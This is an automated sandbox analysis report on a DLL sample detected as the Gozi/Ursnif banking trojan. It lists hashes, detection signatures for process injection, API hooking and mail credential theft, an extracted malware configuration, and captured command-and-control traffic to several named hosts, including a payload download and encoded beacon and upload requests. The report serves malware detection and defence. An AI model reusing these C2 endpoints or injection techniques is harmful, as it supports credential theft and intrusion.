Analysis Report out.dll

Overview

General Information

Sample Name: out.dll
Analysis ID: 343316
MD5: 2ff0ff62b5cf7e7097f75a37492f02f8
SHA1: 9d60d24299762f4aa7fa71838b58e4e747b95df6
SHA256: 09029ff1f317ccfdd92bfd8ae154328748e761231aabb51872e2b1204315f285
Tags: dll

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: loaddll32.exe.7156.0.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "220", "system": "c5b25fbc4c2f6e09b15c0beea689b7f6hhN", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611371427", "user": "3d11f4f58695dc15e71ab15cd837ada4", "hash": "0x3cfb7f6d", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8% Perma Link
Source: api3.lepini.at Virustotal: Detection: 10% Perma Link
Source: api10.laptok.at Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: out.dll Virustotal: Detection: 36% Perma Link
Source: out.dll ReversingLabs: Detection: 45%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.1040000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

barindex
Uses 32bit PE files
Source: out.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.525112099.00000198C4F60000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.534673965.000001F4112D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F87DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_00F87DD8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0138E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0139888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_013A4FE1
Source: C:\Windows\explorer.exe Code function: 32_2_04DEECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 32_2_04DEECE0
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 32_2_04DEB9E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013905EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_013905EF

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/qvYtom7jPMjc/BwFvjaIO4Bv/MbiT4yG6pHfZnV/ZL7sBbHjAqjjVKuOVsR_2/BwLLpnqz5A7VsJpR/VO84dIDbsiOR8iF/cYWxYBw9oC1caEXJgQ/1ZZhS32tE/_2FIQD8vf0Ka7hthdepE/X6LzVrz2dY0Kt9O92Fg/RdwscE4szAaD7AwXR4Vb_2/BkqnQ_2BhW_2F/lBJqoDb5/VV0dcjLelYqerhB5eYzjTAM/cUE3isCvij/iDKviq_2BgRZp2DXp/gw7kl8fvts1f/V1i5c7M51yH/1feNv9xtSWcKia/RzrYlQJt9o9X3mmLIReIH/gGWW8 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zmvfM_2BxkF2z6LAdGBQYT/VVFUBTjiLtdmv/z1vsS1b9/h_2Fj_2BxFVp8DBu2Dofcsv/Kv6seO5eeW/D_2BeLNZQPv2reEOP/gDxjD6y_2Ba9/4irkQZqxmvf/9gg2SCAj4TalZx/1SLIP2InPcQLc5ZsM9f5y/_2FMOWQ6jsIMXMBN/hDufArlyeEDIAOr/Sco7UD5GaVWTjyRv0y/uryOt5Vso/0DF8H9bz3K9Q8xTOA2GN/nbXSkM052l7YJ25GJNP/F1evg5adcZfk_2FVPUzqLE/34tuFQrR HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k3_2BbdPjjCSjH/Bhzm2iLbw_2BlZFjfzdu9K/QNeuz5NJoJPdd/3RpNk4gX/684IFalzbokAf38NKCQoGB3/giv4u8aUar/1Y3IwJEGTTwG7vgZb/hfQjMo3huzsc/_2B2kxzS9SV/aDAgJWuWGRyIv3/OVgklOZtJCDxn5mV_2BOp/ZWvDrGcJhzM9JQCv/ytbaFIu03cT7HsQ/LvD4iOQPI8imqvRWlT/lJ9Iessga/osAc16h46CUOpOSEj/Yy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/xnHAsL1d/fsXvh_2FqVkJzjJvIXVP386/sdHFYJjUzJ/mq43UZwYK4FgDCOnc/d6cqEgrS6hS0/yp4nDUlwnDa/ddfbdz56Dh1hTq/LrfxBoj9_2FbR1C4Ne_2F/szE2P1qBc4BfGVsX/nGM5l8QMlmw5kmi/QVG_2BIrV4GqfgGs53/ZvRn1P0u9/8VUaGimT1Vpnn1Eb2u3U/bOn04R5ChWboXWbTtj8/m4lBRSaAxwnyjeEKdpyj8r/iXLsJGMs8uSTY/pDl9P04P/3WN74fdSL4m2h4Em0_2BNdG/z7s8dMlVkI/qqzG94ApmaqBEZGQ7/8vA HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/PwElXtu1a1ZKEBW8VI4ILA6/C13ZlCGLPf/xbMloqVHEi2N8EvPw/onOYysTw787u/lNsSQdb7adO/WTcHzLbVAjUFsU/yNI28gR4HNSgUrzaABrB_/2Ff5rClIFDKCPamX/LhKcGHTdcpy3Q1x/C_2FUBl8MXyD7rFF5y/_2BqpwBxk/tzgRETfStG7sL50DxVPi/KudBEmh7ELXBUurmd1W/HnwD8_2F7x9j58GCY_2BCE/FHx8MfU3Gbyrl/GAR0LJZU/2CBuYYB3OJmIjTAisk7a2gA/8gGq_2B5fD/hW5rhKLd6LFogxF1_/2BMayi7nxB4/VTo4 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: app.crasa.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 18:10:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/y
Source: explorer.exe, 00000020.00000000.563196482.0000000008455000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k
Source: explorer.exe, 00000020.00000000.558064670.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zm
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: RuntimeBroker.exe, 00000025.00000000.575870278.0000021910AF8000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000025.00000000.575870278.0000021910AF8000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000017.00000002.585596596.000001F7DDD11000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
